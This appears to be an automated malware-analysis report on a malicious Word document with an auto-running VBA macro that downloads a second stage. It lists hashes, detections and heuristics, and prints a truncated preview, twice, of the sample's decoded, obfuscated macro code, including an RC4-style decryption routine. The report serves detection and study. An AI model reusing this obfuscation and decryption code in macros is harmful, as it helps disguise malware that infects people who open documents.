Office (OLE) malware analysis — malicious · e07f239eaefc47e0

MALICIOUS

Office (OLE)

248.5 KB Created: 2016-02-07 20:14:00 Authoring application: Microsoft Office Word First seen: 2017-11-29

MD5: cb1e79a4cf71cdfda6979a663291d0ff SHA-1: 65185dd01dcac165aac5c3b3cecbb56e1aba0bb6 SHA-256: e07f239eaefc47e0069f19631bfab52fb730cec21285613a667e47dcdc53d46c

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample contains a VBA macro with a Document_Open auto-execution routine. This macro utilizes the Shell() function, indicating an attempt to execute external commands. The ClamAV detection name 'Doc.Trojan.Agent-1383193' further supports its malicious nature. The primary function of the VBA script appears to be downloading and executing a second-stage payload.

Heuristics 6

ClamAV: Doc.Trojan.Agent-1383193 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Agent-1383193
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.iec.ch In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 59216 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	59216 bytes
SHA-256: `9c8855a6c8f437fd0da0b6c10037d7e532b3d31be95a0f223ed4475f7fc41d48`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Dim OGE(1921) As Long Function D4BZDXHtoIlT9(BtbO() As Byte, KEYMo3zn() As Byte) As String On Error Resume Next Dim VVG6RIpp9g2jgNZJc(0 To 255) As Integer, RtRnr As Long, CuSRMvQgIGGwOkz As Long, C0J6bjpgemsF As Long, W5Q3t8GmDa9O As Byte, EIM() As Byte, IkFgyKBVaC() As Byte ReDim EIM(Uxu2QnGVYymtt0lx(BtbO)) As Byte EIM = BtbO ReDim IkFgyKBVaC(Uxu2QnGVYymtt0lx(KEYMo3zn)) As Byte IkFgyKBVaC = KEYMo3zn For RtRnr = 0 To (64 + 750 + 64 - 750 + 64 + 750 + 64 - 750 - 1) VVG6RIpp9g2jgNZJc(RtRnr) = RtRnr Next RtRnr RtRnr = 0 CuSRMvQgIGGwOkz = 0 C0J6bjpgemsF = 0 For RtRnr = 0 To (64 + 268 + 64 - 268 + 64 + 268 + 64 - 268 - 1) CuSRMvQgIGGwOkz = (CuSRMvQgIGGwOkz + VVG6RIpp9g2jgNZJc(RtRnr) + IkFgyKBVaC(RtRnr Mod (Uxu2QnGVYymtt0lx(KEYMo3zn) + 1))) Mod ((64 + 246 + 64 - 246 + 64 + 246 + 64 - 246)) W5Q3t8GmDa9O = VVG6RIpp9g2jgNZJc(RtRnr) VVG6RIpp9g2jgNZJc(RtRnr) = VVG6RIpp9g2jgNZJc(CuSRMvQgIGGwOkz) VVG6RIpp9g2jgNZJc(CuSRMvQgIGGwOkz) = W5Q3t8GmDa9O Next RtRnr RtRnr = 0 CuSRMvQgIGGwOkz = 0 C0J6bjpgemsF = 0 For RtRnr = 0 To Uxu2QnGVYymtt0lx(BtbO) CuSRMvQgIGGwOkz = (CuSRMvQgIGGwOkz + 1) Mod (64 + 54 + 64 - 54 + 64 + 54 + 64 - 54) C0J6bjpgemsF = (C0J6bjpgemsF + VVG6RIpp9g2jgNZJc(CuSRMvQgIGGwOkz)) Mod (64 + 58 + 64 - 58 + 64 + 58 + 64 - 58) W5Q3t8GmDa9O = VVG6RIpp9g2jgNZJc(CuSRMvQgIGGwOkz) VVG6RIpp9g2jgNZJc(CuSRMvQgIGGwOkz) = VVG6RIpp9g2jgNZJc(C0J6bjpgemsF) VVG6RIpp9g2jgNZJc(C0J6bjpgemsF) = W5Q3t8GmDa9O EIM(RtRnr) = Ex1BxbmL(EIM(RtRnr), (VVG6RIpp9g2jgNZJc((VVG6RIpp9g2jgNZJc(CuSRMvQgIGGwOkz) + VVG6RIpp9g2jgNZJc(C0J6bjpgemsF)) Mod ((64 + 157 + 64 - 157 + 64 + 157 + 64 - 157))))) Next RtRnr D4BZDXHtoIlT9 = zTo(EIM) End Function Function Uxu2QnGVYymtt0lx(ByVal QH6ZZpxoX4zseh As Variant) As Long VVH1kEVg2VRlpF = Day(Now) On Error GoTo Un1PCT3zpV Cd6YGvjkiuS = Day(Now) Dim I8sey16RJ As Long, GiuStH As Variant NcEhnfOz = Day(Now) Do GiuStH = QH6ZZpxoX4zseh(I8sey16RJ) I8sey16RJ = I8sey16RJ + 1 Loop RKYkkQ1IPhvZNS = Day(Now) Un1PCT3zpV: YSAkSwtLjI4zOvYg8 = Day(Now) If I8sey16RJ = 0 Then Exit Function TIjssi9 = Day(Now) Uxu2QnGVYymtt0lx = I8sey16RJ - 1 QImkkPOVFT = Day(Now) End Function Function zNumber(FrmbW1Ww3 As Long, OjCP As Long) As Byte Dim F7 As Long, Ef3I2PixLj As Long For F7 = 48 To 57 If Mid(FrmbW1Ww3, OjCP, 1) = Ef3I2PixLj Then zNumber = F7: Exit For Ef3I2PixLj = Ef3I2PixLj + 1 Next F7 End Function Function zTo(zbyte() As Byte) As String Dim i As Long For i = 0 To Uxu2QnGVYymtt0lx(zbyte) zTo = zTo & zC(zbyte(i)) Next i End Function Function M6G6YPdQKTAd(Utt4RHudl As Long) As Byte() VM1qacdiyqp = Day(Now) Dim J5VPc0efYCX3(3) As Byte, D27a As Long, LYwqMqZgXIFA As Byte EL3fKpzYhvlN4eK = Day(Now) For D27a = 0 To 3 J5VPc0efYCX3(D27a) = (Int(Utt4RHudl / (2 ^ (8 * (3 - D27a))))) And ((2 ^ 8) - 1) Next D27a E7inQcjika = Day(Now) For D27a = 0 To Uxu2QnGVYymtt0lx(J5VPc0efYCX3) \ 2 LYwqMqZgXIFA = J5VPc0efYCX3(D27a) J5VPc0efYCX3(D27a) = J5VPc0efYCX3(Uxu2QnGVYymtt0lx(J5VPc0efYCX3) - D27a) J5VPc0efYCX3(Uxu2QnGVYymtt0lx(J5VPc0efYCX3) - D27a) = LYwqMqZgXIFA Next D27a QqwrKPCQuC = Day(Now) ReDim M6G6YPdQKTAd(3) As Byte FYdbIul2v7j = Day(Now) M6G6YPdQKTAd = J5VPc0efYCX3 XVGMvuJo3Ud = Day(Now) End Function Function XldPou(N1F8nvQsaRP As Integer) As Boolean GKRXRn1E0Iln = Day(Now) Static UFjnWDTuQ5C8PK As Byte BJgpVUXIW = Day(Now) UFjnWDTuQ5C8PK = UFjnWDTuQ5C8PK + 1 OmOqrAo9Vjw = Day(Now) If UFjnWDTuQ5C8PK = 1 Then Debug.Assert Not XldPou(30) Tmc3yxY4iiLm0Rnz1 = Day(Now) XldPou = UFjnWDTuQ5C8PK = 0 M8Sn3stF4g = Day(Now) UFjnWDTuQ5C8PK = 0 YRqurazIDYD = Day(Now) End Function Function zC(ByVal Character As Integer) As String Dim bArr(1) As Byte, Byte1 As Byte, Byte2 As Byte, i As Long If Character < 0 Then Exit Function If Character > (64 + 290 + 64 - 290 + 64 + 290 + 64 - 290 - 1) ... (truncated)

SHA-256: 9c8855a6c8f437fd0da0b6c10037d7e532b3d31be95a0f223ed4475f7fc41d48

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim OGE(1921) As Long
Function D4BZDXHtoIlT9(BtbO() As Byte, KEYMo3zn() As Byte) As String
On Error Resume Next
Dim VVG6RIpp9g2jgNZJc(0 To 255) As Integer, RtRnr As Long, CuSRMvQgIGGwOkz As Long, C0J6bjpgemsF As Long, W5Q3t8GmDa9O As Byte, EIM() As Byte, IkFgyKBVaC() As Byte
ReDim EIM(Uxu2QnGVYymtt0lx(BtbO)) As Byte
EIM = BtbO
ReDim IkFgyKBVaC(Uxu2QnGVYymtt0lx(KEYMo3zn)) As Byte
IkFgyKBVaC = KEYMo3zn
For RtRnr = 0 To (64 + 750 + 64 - 750 + 64 + 750 + 64 - 750 - 1)
VVG6RIpp9g2jgNZJc(RtRnr) = RtRnr
Next RtRnr
RtRnr = 0
CuSRMvQgIGGwOkz = 0
C0J6bjpgemsF = 0
For RtRnr = 0 To (64 + 268 + 64 - 268 + 64 + 268 + 64 - 268 - 1)
CuSRMvQgIGGwOkz = (CuSRMvQgIGGwOkz + VVG6RIpp9g2jgNZJc(RtRnr) + IkFgyKBVaC(RtRnr Mod (Uxu2QnGVYymtt0lx(KEYMo3zn) + 1))) Mod ((64 + 246 + 64 - 246 + 64 + 246 + 64 - 246))
W5Q3t8GmDa9O = VVG6RIpp9g2jgNZJc(RtRnr)
VVG6RIpp9g2jgNZJc(RtRnr) = VVG6RIpp9g2jgNZJc(CuSRMvQgIGGwOkz)
VVG6RIpp9g2jgNZJc(CuSRMvQgIGGwOkz) = W5Q3t8GmDa9O
Next RtRnr
RtRnr = 0
CuSRMvQgIGGwOkz = 0
C0J6bjpgemsF = 0
For RtRnr = 0 To Uxu2QnGVYymtt0lx(BtbO)
CuSRMvQgIGGwOkz = (CuSRMvQgIGGwOkz + 1) Mod (64 + 54 + 64 - 54 + 64 + 54 + 64 - 54)
C0J6bjpgemsF = (C0J6bjpgemsF + VVG6RIpp9g2jgNZJc(CuSRMvQgIGGwOkz)) Mod (64 + 58 + 64 - 58 + 64 + 58 + 64 - 58)
W5Q3t8GmDa9O = VVG6RIpp9g2jgNZJc(CuSRMvQgIGGwOkz)
VVG6RIpp9g2jgNZJc(CuSRMvQgIGGwOkz) = VVG6RIpp9g2jgNZJc(C0J6bjpgemsF)
VVG6RIpp9g2jgNZJc(C0J6bjpgemsF) = W5Q3t8GmDa9O
EIM(RtRnr) = Ex1BxbmL(EIM(RtRnr), (VVG6RIpp9g2jgNZJc((VVG6RIpp9g2jgNZJc(CuSRMvQgIGGwOkz) + VVG6RIpp9g2jgNZJc(C0J6bjpgemsF)) Mod ((64 + 157 + 64 - 157 + 64 + 157 + 64 - 157)))))
Next RtRnr
D4BZDXHtoIlT9 = zTo(EIM)
End Function
Function Uxu2QnGVYymtt0lx(ByVal QH6ZZpxoX4zseh As Variant) As Long
VVH1kEVg2VRlpF = Day(Now)
On Error GoTo Un1PCT3zpV
Cd6YGvjkiuS = Day(Now)
Dim I8sey16RJ As Long, GiuStH As Variant
NcEhnfOz = Day(Now)
Do
GiuStH = QH6ZZpxoX4zseh(I8sey16RJ)
I8sey16RJ = I8sey16RJ + 1
Loop
RKYkkQ1IPhvZNS = Day(Now)
Un1PCT3zpV:
YSAkSwtLjI4zOvYg8 = Day(Now)
If I8sey16RJ = 0 Then Exit Function
TIjssi9 = Day(Now)
Uxu2QnGVYymtt0lx = I8sey16RJ - 1
QImkkPOVFT = Day(Now)
End Function
Function zNumber(FrmbW1Ww3 As Long, OjCP As Long) As Byte
Dim F7 As Long, Ef3I2PixLj As Long
For F7 = 48 To 57
If Mid(FrmbW1Ww3, OjCP, 1) = Ef3I2PixLj Then zNumber = F7: Exit For
Ef3I2PixLj = Ef3I2PixLj + 1
Next F7
End Function
Function zTo(zbyte() As Byte) As String
Dim i As Long
For i = 0 To Uxu2QnGVYymtt0lx(zbyte)
zTo = zTo & zC(zbyte(i))
Next i
End Function
Function M6G6YPdQKTAd(Utt4RHudl As Long) As Byte()
VM1qacdiyqp = Day(Now)
Dim J5VPc0efYCX3(3) As Byte, D27a As Long, LYwqMqZgXIFA As Byte
EL3fKpzYhvlN4eK = Day(Now)
For D27a = 0 To 3
J5VPc0efYCX3(D27a) = (Int(Utt4RHudl / (2 ^ (8 * (3 - D27a))))) And ((2 ^ 8) - 1)
Next D27a
E7inQcjika = Day(Now)
For D27a = 0 To Uxu2QnGVYymtt0lx(J5VPc0efYCX3) \ 2
LYwqMqZgXIFA = J5VPc0efYCX3(D27a)
J5VPc0efYCX3(D27a) = J5VPc0efYCX3(Uxu2QnGVYymtt0lx(J5VPc0efYCX3) - D27a)
J5VPc0efYCX3(Uxu2QnGVYymtt0lx(J5VPc0efYCX3) - D27a) = LYwqMqZgXIFA
Next D27a
QqwrKPCQuC = Day(Now)
ReDim M6G6YPdQKTAd(3) As Byte
FYdbIul2v7j = Day(Now)
M6G6YPdQKTAd = J5VPc0efYCX3
XVGMvuJo3Ud = Day(Now)
End Function
Function XldPou(N1F8nvQsaRP As Integer) As Boolean
GKRXRn1E0Iln = Day(Now)
Static UFjnWDTuQ5C8PK As Byte
BJgpVUXIW = Day(Now)
UFjnWDTuQ5C8PK = UFjnWDTuQ5C8PK + 1
OmOqrAo9Vjw = Day(Now)
If UFjnWDTuQ5C8PK = 1 Then Debug.Assert Not XldPou(30)
Tmc3yxY4iiLm0Rnz1 = Day(Now)
XldPou = UFjnWDTuQ5C8PK = 0
M8Sn3stF4g = Day(Now)
UFjnWDTuQ5C8PK = 0
YRqurazIDYD = Day(Now)
End Function
Function zC(ByVal Character As Integer) As String
Dim bArr(1) As Byte, Byte1  As Byte, Byte2  As Byte, i As Long
If Character < 0 Then Exit Function
If Character > (64 + 290 + 64 - 290 + 64 + 290 + 64 - 290 - 1)
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.